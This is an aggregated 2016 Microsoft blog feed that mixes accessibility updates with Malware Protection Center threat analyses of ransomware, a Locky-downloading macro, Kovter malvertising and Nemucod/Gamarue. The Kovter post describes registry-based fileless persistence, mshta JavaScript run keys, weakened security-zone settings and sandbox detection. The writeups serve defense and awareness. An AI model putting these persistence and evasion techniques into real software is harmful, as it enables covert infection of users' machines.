  • Windows 10: As we near the one-year anniversary of the availability of Windows 10, we’re making progress toward our vision of more personal computing for everyone. We know there is more work ahead to deliver on this vision, but we’re excited about the progress we’re making. If you are on Windows 10, make sure you have the latest updates, which include improvements to Narrator, Microsoft Edge and the Mail app. Mail on Windows 10 has more intuitive navigation, predictable keyboard behavior and reliability with screen readers. Narrator has improved performance, speed, reliability and usability. We’re working to improve browsing and reading experiences on Microsoft Edge for both built-in assistive technologies and other commercial assistive technology by the end of 2016. Recent updates to Microsoft Edge’s native support for the modern UI Automation accessibility framework were also made. Don’t forget that for customers who use assistive technologies, the July 29 free upgrade deadline for Windows 10 does not apply to you. Stay tuned for details – they are coming! If you’re new to Windows 10, please check out this video to get you started!
  • Office 365: One of the most common questions is what version of Office do I recommend. The answer here is simple, download Office 365. The team is working hard on two simple goals – allow everyone to create more accessible content from a variety of devices and design experiences that allow people of all abilities to be productive on every device. Every month, we’re releasing new updates to Office 365. To be the first to get these, be sure to become an Office Insider. Features like ensuring that others are able to access content in documents by running the Accessibility Checker in Office apps for PCs (coming to Office apps for Mac and Office Online apps by the end of the year). Improvements to Word Online which allow authors to easily add alt-text in documents (coming to additional apps and platforms by the end of the year); screen reader and keyboard/touch navigations for Outlook Mail and Calendar, OneDrive for Business and Yammer (in addition to usability for speech input); as well as the introduction of Tell Me in Office Apps for PC. This team has also published more than 300 articles in the past few months to help you accomplish key tasks. For additional information on enhancements and availability, check out today’s post on the Office Blog. You can also follow our video series on Microsoft Mechanics and check back here for updates.
  • Disability Answer Desk: The top question often comes from a personal place. Ultimately, we all want to understand how technology can help a parent, friend, family member or yourself. It’s our job to make our products easy to use, but we know that sometimes you just need a human to bounce a question, idea or problem off of. The place to go is the Disability Answer Desk. It’s a free service that’s available in English, French and Spanish in 18 countries via email, chat, and direct ASL video in the U.S.. It provides technical assistance, general tips and tricks, and is a place to share feedback. We receive around 10,000 inquiries a month and the team is ready to help in any way they can. Bookmark it, use it!
  • The Next Big Thing: Many do not know that within Microsoft, there are several emerging projects dedicated to creating technologies that empower people with disabilities to do more through technology. For example, we introduced the Learning Tools for OneNote Preview, a toolbar add-in which improves the reading and writing experience, especially for those with dyslexia. There is also the Cities Unlocked project, which uses Microsoft 3D soundscape technology to help people with vision loss navigate around town. And, at Microsoft’s 2016 Build Conference, we debuted a new research project called Seeing AI, which is aimed at helping people who are visually impaired or blind understand more about who and what is around them. It’s only a matter of time before next-generation technologies, such as the Seeing AI research project, come to market.

To us, this is about delivering on our mission to empower people and organizations to achieve more. The possibilities are limitless and I can’t wait to share more in coming months. Please check back here to continue receiving the most current accessibility updates from across the company. Thank you again for your support, ideas, and thoughts. The feedback you are sending us on your experiences using our products is hugely important as we continue working to improve technology to better meet your needs – keep it coming! You can share your ideas on the Accessibility Forum, take the Accessibility feedback survey, and don’t forget to bookmark the Disability Answer Desk and Accessibility Blog!

The 5Ws and 1H of Ransomware, 19 May 2016 06:00:40 +0000 the past three months, we have seen ransomware hop its way across globe. Majority of the ransomware incidents are found in the United States, then Italy, and Canada.

Ransomware geographical distribution for from February to April 2016

The prevalence of large-scale ransomware incidents led the United States and Canadian governments to issue a joint statement about ransomware. Due to the global ransomware incidents, the Swiss government along with some industry players will also hold the Ransomware InfoDay today, May 19, 2016, as part of the ransomware awareness campaigns.

The following table shows the top 20 countries where ransomware is most prevalent.

Top 20 countries with the most prevalent ransomware incidents

This blog answers the frequently asked questions (who, what, where, when, why, and how) about a malware with an effect so tangible that it manages to lock your files, extort money from you, and disrupt important public and private operations.

Case in point: RANSOMWARE


Whom does it affect?

You! Do you use any mobile devices, PC, laptop, or the internet for surfing, emailing, working, or shopping online?Who could be a ransomware victim?

If yes, then you are a potential ransomware victim. Ensure that precautionary measures are taken, see the Prevention section for details.



What is ransomware?

Ransomware is a malware that stealthily gets installedWhat is ransomware? in your PC or mobile device and holds your files or operating system functions for ransom. It restricts you from using your PC or mobile device, and fromaccessing your files (files are sometimes locked or encrypted), unless you pay the ransom (in exchange for file decryption).

Paying the ransom (either through credit card or Bitcoins) however, does not guarantee that you’ll get your files back. Prevention is still way better than allowing yourself to be infected and then trying to find a cure. See our Ransomware page for details.



What does a ransomware attack look like?

Ransomware targets your pictures, documents, files, and data that are personally invaluable.

You can tell that you are under attack when you see any of the following:

  • Ransomware note
  • Encrypted files
  • Renamed files
  • Locked browser
  • Locked screen

However, the ransomware attack symptom varies from one ransomware type to another:

Sample ransomware lockscreens and ransom notes


What!?! There are several ransomware types?

Yes. From the time that it first surfaced in 1989, ransomware morphed into different forms as it assimilates to people’s computing habits, leverage recent technologies, and monetization strategies available.

There are two types of ransomware – lockscreen ransomware and encryption ransomware.

  • Lockscreen ransomware shows a full-screen message that prevents you from accessing your PC or files. It says you have to pay money (a “ransom”) to get access to your PC again.
  • Encryption ransomware changes your files so you can’t use them. It does this by encrypting the files – see the Details for enterprises section if you’re interested in the technologies and techniques we’ve seen.

Older versions of ransom usually claim you have done something illegal with your PC, and that you are being fined by a police force or government agency.

These claims are false. It is a scare tactic designed to make you pay the money without telling anyone who might be able to restore your PC.

Ransomware history from 1989 to 2016


Where can a ransomware attack happen?

R_consumer7Computers and mobile devices.

Ransomware employs its encryption and monetization strategies across PC and mobile devices.





When can a ransomware attack start?Ransomware attack workflow

Potential victims can fall into the ransomware trap if they are:

  • Browsing untrusted websites
  • Not careful about downloading or opening file attachments which are known to contain malicious code from spam emails. That also includes compressed files or files inside archives. Some possible attachments can be:
    • Executables (.ade, .adp, .ani, .bas, .bat, .chm, .cmd, .com, .cpl, .crt, .hlp, .ht, .hta, .inf, .ins, .isp, .job, .js, .jse, .lnk, .mda, .mdb, .mde, .mdz, .msc, .msi, .msp, .mst, .pcd, .reg, .scr, .sct, .shs, .url, .vb, .vbe, .vbs, .wsc, .wsf, .wsh, .exe, .pif, etc.)
    • Office files that support macros (.doc, .xls, .docm, .xlsm, .pptm, etc.)
  • Installing pirated software, outdated software programs or operating systems
  • Using a PC that is connected to an already infected network


Why do malware perpetrators victimize people with ransomware?

Because they have malicious or criminal intentions, and see it as an easy way to make money. They take advantage of people’s ignorance, unpatched software vulnerability, or zero-day vulnerability.

Ransomware in the news affecting crucial public and private services


On the other hand, it mars an enterprise company’s security and reputation as some ransomware incidents halt crucial services such as hospitals – thus forcing infected users to pay up if they haven’t backed up their data.

Why must you educate yourself about ransomware?

Because it can take your hard-earned money in exchange of the stuff you already own – your data or files!! Exxroute ransomware, for example, demands $500 and doubles the ransom as you delay the payment. It also starts deleting your files if you delay the payment.

It can also violate your privacy, disrupt your work or personal life, and possibly harm your reputation.

If the ransomware perpetrators are cashing in on people’s ignorance, then educating yourself about it can help disrupt their business.

Download the ransomware infographics here.

How can you avoid and bounce from a ransomware attack?


  • Keep your Windows Operating System and antivirus up-to-date.  Upgrade to Windows 10.
  • Regularly back-up your files in an external hard-drive.
  • Enable file history or system protection. In your Windows 10 or Windows 8.1 devices, you must have your file history enabled and you have to setup a drive for file history.
  • Use OneDrive for Consumer or for Business.
  • Beware of phishing emails, spams, and clicking malicious attachment.
  • Use Microsoft Edge to get SmartScreen protection. It will prevent you from browsing sites that are known to be hosting exploits, and protect you from socially-engineered attacks such as phishing and malware downloads.
  • Disable the loading of macros in your Office programs.
  • Disable your Remote Desktop feature whenever possible.
  • Use two factor authentication.
  • Use a safe and password-protected internet connection.
  • Avoid browsing web sites that are known for being malware breeding grounds (illegal download sites, porn sites, etc.).



In Office 365’s How to deal with ransomware blog, there are several options on how one can remediate or recover from a ransomware attack. Here are some of the few that are applicable for a home user or those in the information industry like you:

  1. Make sure you have backed-up your files.
  2. Recover the files in your device. If you have previously turned File History on in Windows 10 and Windows 8.1 devices or System Protection in Windows 7 and Windows Vista devices, you can (in some cases) recover your local files and folders.

To restore your files or folders in Windows 10 and Windows 8.1:

  • Swipe in from the right edge of the screen, tap Search (or if you’re using a mouse, point to the upper-right corner of the screen, move the mouse pointer down, and then click Search). Enter “restore your files” in the search box, and then tap or click Restore your files with File History.
  • Enter the name of file you’re looking for in the search box, or use the left and right arrows to browse through different versions of your folders and files.
  • Select what you want to restore to its original location, and then tap or click the Restore button. If you want to restore your files onto a different location than the original, press and hold, or right-click the Restore button, tap or click Restore To, and then choose a new location.

Source: Restore files or folders using File History

To restore your files in Windows 7 and Windows Vista

  • Right-click the file or folder, and then click Restore previous versions. You’ll see a list of available previous versions of the file or folder. The list will include files saved on a backup (if you’re using Windows Backup to back up your files) as well as restore points. Note: To restore a previous version of a file or folder that’s included in a library, right-click the file or folder in the location where it’s saved, rather than in the library. For example, to restore a previous version of a picture that’s included in the Pictures library but is stored in the My Pictures folder, right-click the My Pictures folder, and then click Restore previous versions. For more information about libraries, see Include folders in a library.
  • Before restoring a previous version of a file or folder, select the previous version, and then click Open to view it to make sure it’s the version you want. Note: You can’t open or copy previous versions of files that were created by Windows Backup, but you can restore them.
  • To restore a previous version, select the previous version, and then click Restore.

Warning: The file or folder will replace the current version on your computer, and the replacement cannot be undone. Note: If the Restore button isn’t available, you can’t restore a previous version of the file or folder to its original location. However, you might be able to open it or save it to a different location.

Source: Previous versions of files: frequently asked questions

Important: Some ransomware will also encrypt or delete the backup versions and will not allow you to do the actions described before. If this is the case, you need to rely on backups in external drives (not affected by the ransomware) or OneDrive (Next step).

Warning: If the folder is synced to OneDrive and you are not using the latest version of Windows, there might be some limitations using File History.

3. Recover your files in your OneDrive for Consumer.

4. Recover your files in your OneDrive for Business.

If you use OneDrive for Business, it will allow you to recover any files you have stored in it. You can use either of the following options:

Restoring the files using the Portal

Users can restore previous version of the file through the user interface. To do this you can:

1. Go to OneDrive for Business in the portal.

2. Right click the file you want to recover, and select Version History.

3. Click the dropdown list of the version you want to recover and select restore.


If you want to learn more about this feature, take a look at the Restore a previous version of a document in OneDrive for Business support article.

Site Collection Restore service request

If a large number of files were impacted, using the user interface in the portal will not be a viable option. In this case, create a support request for a ‘Site Collection Restore’. This request can restore up to 14 days in the past. To learn how to do this please take a look at the Restore Option in SharePoint Online blog post.


Microsoft Malware Protection Center


Malicious macro using a sneaky new trick, 18 May 2016 03:13:34 +0000 recently came across a file (ORDER-549-6303896-2172940.docm, SHA1: 952d788f0759835553708dbe323fd08b5a33ec66) containing a VBA project that scripts a malicious macro (SHA1: 73c4c3869304a10ec598a50791b7de1e7da58f36). We added it under the detection TrojanDownloader:O97M/Donoff – a large family of Office-targeting macro-based malware that has been active for several years (see our blog category on macro-based malware for more blogs).

However, there wasn’t an immediate, obvious identification that this file was actually malicious. It’s a Word file that contains seven VBA modules and a VBA user form with a few buttons (using the CommandButton elements).

Screenshot of VBA script editor showing the user form and list of modules

The VBA user form contains three buttons


The VBA modules look like legitimate SQL programs powered with a macro; no malicious code found there … However, after further investigation we noticed a strange string in the Caption field for CommandButton3 in the user form.

It appeared to be some sort of encrypted string.

We went back and reviewed the other modules in the file, and sure enough – there’s something unusual going on in Module2. A macro there (UsariosConectados) decrypts the string in the Caption field for CommandButton3, which turns out to be a URL. It uses the deault autoopen() macro to run the entire VBA project when the document is opened.

Screenshot of the VBA macro script in Module2 that decrypts the Caption string

The macro script in Module2 decrypts the string in the Caption field


The macro will connect to the URL (hxxp://<uniqueid>) to download a payload which we detect as Ransom:Win32/Locky (SHA1: b91daa9b78720acb2f008048f5844d8f1649a5c4).

The VBA project (and, therefore, the macro) will automatically run if the user enables macros when opening the file – our strongest suggestion for the prevention of Office-targeting macro-based malware is to only enable macros if you wrote the macro yourself, or completely trust and know the person who wrote it.

See our threat intelligence report on macros and our macro-based malware page for further guidance on preventing and recovering from these types of attacks.

-Marianne Mallen and Wei Li

New Edge Blog: Building a more accessible user experience with HTML5 and UIA, 13 May 2016 18:15:56 +0000 the Edge team posted a new blog that walks through ongoing work to advance Edge’s accessibility. The goal is to ensure developers and users can easily get accurate information on platform accessibility across browsers, making it easier to build more accessible sites and make informed decisions when using accessibility features. The blog includes some concrete examples of how the new Edge accessibility architecture improves the end user’s experience, and specifically how markup defines the experience of navigating with assistive technologies like screen readers. The many examples in the blog focus on Narrator, but any screen reader using UIA will be able to take advantage of these improvements.

Read the full blog post about these improvements on the Microsoft Edge Developer Blog.

Large Kovter digitally-signed malvertising campaign and MSRT cleanup release, 10 May 2016 22:12:20 +0000 is a malware family that is well known for being tricky to detect and remove because of its file-less design after infection. Users from United States are nearly exclusively being targeted, and infected PCs are used to perform click-fraud and install additional malware on your machine.

Starting April 21, 2016, we observed a large Kovter malware attack where in just a week and a half we protected over 350,000 PCs from this threat. Interestingly, for this campaign the attackers managed to acquire trusted SSL digital certificates to secure an HTTPS SSL connection and their own code signing certificate to sign the downloaded malware with.

Kovter carried out this attack campaign using a technique called malvertising, masquerading as a fake Adobe Flash update. In this blog we will share some research into the structure of their malvertising attack, how our MSRT release will be cleaning it up, and the technical details of how Kovter installs and attempts to remain persistent as a file-less malware after it infects a PC.

Kovter’s digitally signed malvertising campaign

Malvertising is a technique used by bad actors to attack your PC, where they buy advertisement space with ad networks, ad exchanges, and ad publishers. These ads then appear on many websites who use the same advertisement network, and attacks some of the users as they visit the websites.

Unlike typical advertisements that require a user click, malvertising attacks often attack as soon as you visit a website that displays them.

Using this technique, we’ve seen malicious attackers use varied techniques such as:

  • Displaying repeated message boxes claiming your PC is infected and encouraging you to call a support phone number for help. These are malicious and they have not detected a problem on your PC.
  • Attempting to lock your browser and demanding payment as ransomware. You can close your browser or restart your computer to escape. This type of ransomware hasn’t really locked your PC.
  • Loading an exploit kit to attack your browser or browser plugin.
  • Claiming your browser, Adobe Flash Player, or Java is out of date and in need of an update. Often they will claim the update is required to view the website content or is needed for security reasons. Keeping these applications up-to-date is really important to keep your PC safe and secure from the latest vulnerabilities. However, you should never trust a website claiming to detect security problems on your PC. Instead, let these apps update if they request to outside of your browser or search for the official websites to install the missing components.

The recent Kovter malvertising attack falls into this last category, using a social engineering attack that states that your Adobe Flash is out of date and needs to be updated for security reasons.

Figure 1 below illustrates the Kovter infection chain used in this attack. Users visiting effected websites are redirected to fake websites impersonating the Adobe Flash hallmark download page claiming your Flash Player is out of date, and Trojan:Win32/Kovter is automatically downloaded pretending to be “FlashPlayer.exe”.

Kovter infection chain

Figure 1 – Kovter’s fake Adobe update malvertising infection chain


For this most recent campaign, we saw Kovter perpetrators redirecting to the following domains:


The domains from this campaign and previous campaigns commonly use the same domain registration information, and can be identified by:

Admin Email:

As soon as the malicious advertisement is displayed, users are redirected to the Kovter social engineering page hosted using HTTPS according to the following pattern:

https://<domain>/<random numbers>/<random hex>.html

For example:


By using HTTPS, your browser displays a ‘secure’ lock symbol – incorrectly adding to the user trust that the website is safe while at the same time preventing most network intrusion protection systems from protecting the user. Endpoint antimalware solutions, such as Windows Defender, still protect the user however. We were unable to confirm due to the servers being taken down, but reports online suggest trial COMODO SSL certificates were being used to secure these connections for the Kovter campaigns in the past.

When you visit the website, it automatically downloads Kovter as “FlashPlayer.exe”. It downloads from the same domains using a pattern such as:


Some example FlashPlayer.exe downloaded files for reference are as follows:

Sha1 Md5


These downloaded Kovter files were digitally signed by a trusted COMODO certificate under the company name “Itgms Ltd” as follows:

Comodo certificateComodo certificate


We notified COMODO of the code signing abuse by Kovter and they have since revoked this certificate. We suspect that the actors behind Kovter code-signed their fake Adobe Flash installer to increase the number of users who trust the downloaded file and decide to run it.

This is one of the largest cases of trusted code-signing by malware that we have seen with more than 350,000 unique machines running our security products protected.

Given that we haven’t seen this certificate used for non-Kovter files, we believe the private key for the certificate was not stolen but rather issued to the malware authors directly. The domain used by the contact email address to acquire the certificate ( was registered November 10, 2015, just eight days before the certificate was acquired, but we did not observe this certificate signing files in the wild until this campaign ramped up a few weeks ago on April 21, 2016. To date, we have seen this certificate only being used to sign Kovter files.

The sheer volume of PCs encountering Kovter during this attack, along with the attackers appearing to have been directly issued their own digital certificates is a cause for concern. Lucky for us, the digital signing actually worked to help us better identify files that are Kovter to better protect you – since we are able to uniquely identify and remove all files signed by this certificate. We will be continuing to monitor Kovter to keep you protected.


MSRT coverage

As part of our ongoing effort to provide better malware protection, the May release of the Microsoft Malicious Software Removal Tool (MSRT) includes detections for Kovter and Locky. Locky is a family of ransomware which uses infected Microsoft Office files to download the ransomware onto your PC

By adding Kovter and Locky detections to MSRT we hope to have a bigger impact by reaching more affected machines and helping remove these threats. However, as with all threats, prevention is the best protection.


Kovter Installation

On top of the recent Kovter Adobe Flash malvertising attack, we have also seen this trojan arrive as an attachment to spam emails. We have seen this malware being downloaded by TrojanDownloader:JS/Nemucod, for example:

  • Sha1: 36e81f09d2e1f9440433b080b056d3437a99a8e1
  • Md5: 74dccbc97e6bffbf05ee269adeaac7f8

When Kovter is installed, the malware drops its main payload as data in a registry key (HKCU\software\<random_chars> or HKLM\software\<random_chars>). For example, we have seen it drop the payload into the following registry keys:

  • hklm\software\oziyns8
  • hklm\software\2pxhqtn
  • hkcu\software\mpcjbe00f
  • hkcu\software\fxzozieg

Kovter then installs JavaScript as a run key registry value using paths that automatically run on startup such as:

  • hklm\software\microsoft\windows\currentversion\run
  • hklm\software\microsoft\windows\currentversion\policies\explorer\run
  • hklm\software\wow6432node\microsoft\windows\currentversion\run
  • hklm\software\wow6432node\microsoft\windows\currentversion\policies\explorer\run
  • hkcu\software\microsoft\windows\currentversion\run
  • hkcu\software\classes\<random_chars>\shell\open\command

The dropped JavaScript registry usually has the format: “mshta javascript: <malicious Kovter JavaScript>”. When executed at startup, this JavaScript loads the Kovter payload data registry key data into memory and execute it.

One executing in memory, the malware also injects itself into legitimate processes including:

  • regsvr32.exe
  • svchost.exe
  • iexplorer.exe
  • explorer.exe

After installation, the malware will remove the original installer from the disk leaving only registry keys that contain the malware.



Lowers Internet security settings

It modifies the following registry entries to lower your Internet security settings:

  • In subkey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Sets value: “1400” With data: “0
  • In subkey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Sets value: “1400” With data: “0

Sends your personal information to a remote server

We have seen this malware send information about your PC to the attacker, including:

  • Antivirus software you are using
  • Date and time zone
  • GUID
  • Language
  • Operating system

It can also detect some specific tools you use in your PC and sends that information back to the attacker:

  • JoeBox
  • QEmuVirtualPC
  • Sandboxie
  • SunbeltSandboxie
  • VirtualBox
  • VirtualPC
  • VMWare
  • Wireshark


This threat can silently visit websites without your consent to perform click-fraud by clicking on advertisements. It does so by running several instances of Internet Explorer in the background.

Download updates or other malware

This threat can download and run files. Kovter uses this capability to update itself to a new version. This update capability has been used recently to install other malware such as:



Kovter prevalence or encounters chart

Figure 2 – Kovter’s prevalence for the past two months shows a spike in the month of April


Kovter's geographic distribution

Figure 3 – Kovter’s geographic distribution shows that majority of the affected machines are in the United States


Mitigation and prevention

To help stay protected from Kovter, Locky and other threats, use an up-to-date Windows Defender for Windows 10 as your antimalware scanner, and ensure that MAPS has been enabled.

Though trojans have been a permanent fixture in the malware ecosystem, there’s still something that you or your administrators can proactively do:


Geoff McDonald and Duc Nguyen


May 2016 security update release, 10 May 2016 17:00:52 +0000 we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released.

More information about this month’s security updates and advisories can be found in the Security TechNet Library.

MSRC team

Further Details on the Coming Improvements to Narrator in Windows 10, 09 May 2016 20:45:54 +0000

The following blog post was written by Kelly Ford. He is Senior Program Manager on the Windows Accessibility team.

We recently blogged about some improvements to Narrator in Windows 10.  Now that some of those changes are available to Windows Insiders, we wanted to provide you with specifics on using some of the updated features in Narrator. These changes are currently best experienced in Windows Insider Preview Build 14328 or newer.  Some of the updated features we will cover include:

  • Scan Mode
  • Verbose modes
  • Punctuation modes
  • Faster text to speech Voices
  • AutoSuggest Announcements

Scan Mode

We’ve introduced a new navigation mode to Narrator called Scan mode.  When this mode is on, you can use the UP and DOWN ARROW keys to move through applications and web content.  Scan Mode is turned on with a press of CAPS LOCK and SPACE.  While you are in Scan mode you can press SPACE to activate an item of interest, such as following a link on a web page or pressing a button in an app. Scan Mode is turned off with another press of CAPS LOCK+SPACE.
Scan Mode is also intended to make navigating tables easier and supports common keys found in other screen readers for table navigation.  Use CTRL+ALT and ARROW KEYS when in a table to navigate by cells in a row or column.

Scan Mode has several additional hotkeys, as seen in the below table, that you can use to move through applications and content as well.

Key Description
CAPS LOCK+SPACE Toggle Scan Mode
SPACE Activate the item with focus in Scan Mode
ENTER Do a secondary action on the item with focus when supported
H Move to the next heading
SHIFT+H Move to the previous heading
ALT+DOWN ARROW Move to the next heading
ALT+UP ARROW Move to the previous heading
P Move to the next paragraph
SHIFT+P Move to the previous paragraph
CTRL+DOWN ARROW Move to the next paragraph
CTRL+UP ARROW Move to the previous paragraph
K Move to the next link
SHIFT+K Move to the previous link
D Next landmark
SHIFT+D Previous landmark
T Move to next table
SHIFT+T Move to previous table
CTRL+ALT+LEFT ARROW Move left a cell in a table
CTRL+ALT+RIGHT ARROW Move right a cell in a table
CTRL+ALT+DOWN ARROW Move down a cell in a table
CTRL+ALT+UP ARROW Move up a cell in a table


Verbose modes

Narrator now supports six levels of verbosity for giving you more details about the characteristics of text.  For example, at what we call Verbose mode 0 (zero), you will hear just the text.  At verbose mode 1, you will hear if the text is a heading.  At other verbose levels, you will get varying indications of other text properties, like text color or formatting as an example.  You can quickly cycle through the different levels for this feature by pressing CAPS LOCK+A.  Or alternatively, you can move forward through the verbosity levels with CAPS LOCK+CTRL+(PLUS), or move through them in reverse with CAPS LOCK+CTRL+(MINUS)-.

Here is a bit more detail on what’s communicated at the different Narrator Verbose levels.

Level Summary Some Examples
Zero Text only Hear text and that is it.
One Header and Errors Help with some basics on the web and daily typing errors in emails. Contains information such as:  Heading levels, and errors in documents such as spelling, grammar, and others.
Two Basic Formatting Designed based on commonly found information in emails and webpages. Contains Bullet styles, Font Weight (bold), Underline, Italics, Subscript, Superscript, and color.
Three Other Annotations Footer, Header, and unknown.
Four Extended Formatting Font Name, Font Size, other list styles.
Five Layout and animation information Paragraph starts with an indent, type of animation, and other such data.

Punctuation modes

Narrator now supports the ability to give you more control over how much punctuation you hear when reading text.  CAPS LOCK+ALT+(PLUS) and CAPS LOCK+ALT+(MINUS) cycle through the settings for punctuation.  The settings for punctuation include none, some, most, all and math along with default.

Faster Text to Speech

We’ve added three new voices to Narrator that offer a much faster top rate of speech.  Our current voices average a maximum of roughly 400 words per minute.  The three new voices average nearly twice that at approximately 800 words per minute.  You can select one of these new voices by pressing ALT+TAB when Narrator is running and then choosing voice settings.  Select either the David Mobile, Zira Mobile or Mark Mobile voices to get these faster speech rates.  As a reminder, CAPS LOCK+(PLUS) increases Narrator’s speaking rate and CAPS LOCK+(MINUS) decreases the rate of speech.

AutoSuggest Announcements

Many applications in Windows 10 offer what we call AutoSuggestions as you enter information.  For example, when you start entering a search term in the Cortana search box you will get suggestions based on what you are entering.  With Narrator you will now get a verbal hint with an audio indication when these suggestions are available.  Use CAPS LOCK+DOWN ARROW on the keyboard, or a flick down if you are using touch, to change to the list of suggestions.  Use CAPS LOCK+RIGHT and LEFT ARROWS on a keyboard, or flicks right and left, to move through the list of suggestions.  Use CAPS LOCK+ENTER or a double tap to pick the suggestion you want.  You can alternatively use the DOWN ARROW to move through suggestions and simply press ENTER to select the one you want to use.

New to Narrator

Narrator is a screen reading program that can be used by people who are blind to access the computer, Windows phone or Xbox.  If you are new to Narrator, the program can be launched by Pressing the Windows key and Enter simultaneously on the keyboard.  You can launch Narrator on a tablet or phone by pressing the Volume up and Start button.

Giving Us Feedback

We’d love to have your feedback on these features and your experiences with Narrator.  You can use Narrator’s own feedback command of pressing CAPS LOCK+E twice to enter comments about your experiences and send us feedback. Pressing CAPS LOCK+E once will let us know you are unhappy about what you are currently doing.  You can also leave us comments on our Microsoft Accessibility User Voice site.  And don’t forget, If you are using Narrator or other assistive technology, you can get technical support from the Microsoft Disability Answer Desk.

Gamarue, Nemucod, and JavaScript, 09 May 2016 16:00:20 +0000 is now being used largely to download malware because it’s easy to obfuscate the code and it has a small size. Most recently, one of the most predominant JavaScript malware that has been spreading other malware is Nemucod.

This JavaScript trojan downloads additional malware (such as Win32/Tescrypt and Win32/Crowti – two pervasive ransomware trojans that have been doing the rounds for a few years[1] – and Win32/Fareit) and installs it on a victim’s system through spam email.

Recently, however, we’ve seen another version of Nemucod distributing Gamarue malware to users.

Gamarue, also known as “Andromeda bot”, has been known to arrive through exploit kits, other executable malware downloaders (including Win32/Dofoil and Win32/Beebone), removable drives, and through that old stand-by: spam campaigns.

The shift to a JavaScript-obfuscated downloader might be an attempt by the malware authors to evade the increasing detection capabilities and sophistication in antimalware products.

A quick look into the obfuscated JavaScript code shows us that, aside from the encrypted strings, it uses variables with random names to hide its real code.

Sample of an obfuscated JavaScript code

Figure 1: Obfuscated code


The decrypted code is shown in the following image:

Sample of a decrypted JavaScript previously-obfuscated code

Figure 2: De-obfuscated code


Nemucod is known to have different hashes for each variant. For this one particular hash, since the detection was written in early April, 2016, it reached in total of 982 distinct machines with 4,192 reports – which indicates the number of Gamarue installations that could have occurred if it was not detected.

Nemucod detection rate

Figure 3:  Nemucod detection rate


Gamarue has been observed stealing vital information from your PC. It can also accept commands from a command and control (C&C) server. Depending on the commands received, a malicious hacker can perform various actions on the machine. See our family description of Win32/Gamarue for more information.



Nemucod impact

Since the start of 2016, Nemucod has risen in prevalence.

Rising Nemucod prevalence trend

Figure 4:  Rising Nemucod prevalence trend shows that it peaked on April


For the top 10 countries for Nemucod detections, the US takes a third, followed by Italy and Japan. The spread of infections is quite widespread across the globe.

Nemucod geoloc distribution from January to April 2016

Figure 5: Majority of the Nemucod infections are seen in the United States

Overall, however, it still remains relatively low, especially when compared to Gamarue.


Gamarue impact

Unlike Nemucod, Gamarue detections started high and have remained high since late last year. Overall, numbers have dropped a small amount since the start of 2016. Interestingly, there are large troughs during every weekend, with a return to higher numbers on Monday. This can indicate that Gamarue is especially pervasive either in enterprises, or in spam email campaigns.

Gamarue prevalence chart shows steady pattern from January to April 2016

Figure 6: The Gamarue infection trend shows a steady pattern


For Gamarue, the top 10 countries see distribution largely through India, Asia, Mexico, and Pakistan.

Gamarue geoloc distribution from January to April 2016

Figure 7: Majority of the Gamarue infection hits third world countries


Mitigation and prevention

To help stay protected from Nemucod, Gamarue, and other threats, use Windows Defender for Windows 10, or other up-to-date real-time product as your antimalware scanner.

Use advanced threat and cloud protection

You can boost your protection by using Office 365 Advanced Threat Protection and enabling Microsoft Active Protection Service (MAPS).

Office 365 helps by blocking dangerous email threats; see Overview of Advanced Threat Protection in Exchange: new tools to stop unknown attacks, for details.

MAPS uses cloud protection to help guard against the latest malware threats. You should check if MAPS is enabled on your PC.

Some additional preventive measures that you or your administrators can proactively do:



[1] We’ve published a number of blogs about Crowti, including:

It was also featured in the July 2015 version of the Malicious Software Removal Tool (MSRT):


Donna Sibangan




Accessibility and the Windows 10 Free Upgrade, 06 May 2016 19:00:10 +0000 you may have heard, the free Windows 10 upgrade offer for customers running Windows 7 or Windows 8.1 is set to end on July 29, but we want to clarify that that deadline will *not* apply to customers who use assistive technologies. We are continuing to deliver on our previously-shared vision for accessibility for Windows 10 and we are committed to ensuring that users of assistive technologies have the opportunity to upgrade to Windows 10 for free as we do so.

Stay tuned for more details on how you can take advantage of the free offer. In the meantime, you can read more about our accessibility roadmap for Windows 10 on the Microsoft on the Issues blog.

Microsoft Bounty Programs Expansion – Nano Server Technical Preview Bounty, 30 Apr 2016 00:00:23 +0000 is pleased to announce another expansion of the Microsoft Bounty Programs. Today we begin a bounty for the Nano Server installation option of Windows Server 2016 Technical Preview 5. Please visit to find more details.

Nano Server is a remotely administered, headless installation option of the server operating system. In this first release, the Nano Server deployment is focused on two scenarios:

  1. As the host for compute and/or storage clusters
  2. As a lightweight OS in a VM or container for “born in the cloud” applications.

In summary:

  • All binaries included in the Nano Server configuration of Windows Server 2016 Technical Preview 5 and any subsequent Betas, Technical Previews or Release Candidates during the bounty period
  • Hyper-V escapes and Mitigation Bypass vulnerabilities will be evaluated against the Mitigation Bypass Bounty instead
  • The bounty will run April 29, 2016 – July 29, 2016
  • Bounty payouts will range from $500 USD to $15,000 USD

These additions to the Microsoft Bounty Program will be part of the rigorous security programs at Microsoft. Bounties complement the Microsoft Security Development Lifecycle (SDL), Operational Security Assurance (OSA) framework, regular penetration testing of our products and services, and Security and Compliance Accreditations by third party audits.

As always, the most up-to-date information about the Microsoft Bounty Programs can be found at and in the associated terms and FAQs.

Changes to Security Update Links, 29 Apr 2016 22:17:32 +0000 have historically been published on both the Microsoft Download Center and the Microsoft Update Catalog and Security Bulletins linked directly to update packages on the Microsoft Download Center. Some updates will no longer be available from the Microsoft Download Center.

Security bulletins will continue to link directly to the updates, but will point to the packages on the Microsoft Update Catalog for updates not available on the Microsoft Download Center. Customers that use tools linking to the Microsoft Download Center should follow the links provided in the Security Bulletins or search directly on the Microsoft Update Catalog.

For tips on searching the Microsoft Update Catalogue visit the frequently asked questions page.

Digging deep for PLATINUM, 26 Apr 2016 19:00:41 +0000 blog introduces our latest report from the Windows Defender Advanced Threat Hunting team. You can read the full report at:

There is no shortage of headlines about cybercriminals launching large-scale attacks against organizations. For us, the activity groups that pose the most danger are the ones who selectively target organizations and desire to stay undetected, protect their investment, and maximize their ROI. That’s what motivated us – the Windows Defender Advanced Threat Hunting team, known as hunters – when we recently discovered a novel technique being used by one such activity group.

We have code named this group PLATINUM, following our internal practice of assigning rogue actors chemical element names. Based on our investigations, we know PLATINUM has been active since 2009 and primarily targets governmental organizations, defense institutes, intelligence agencies, and telecommunication providers in South and Southeast Asia. The group has gone to great lengths to develop covert techniques that allow them to conduct cyber-espionage campaigns for years without being detected.

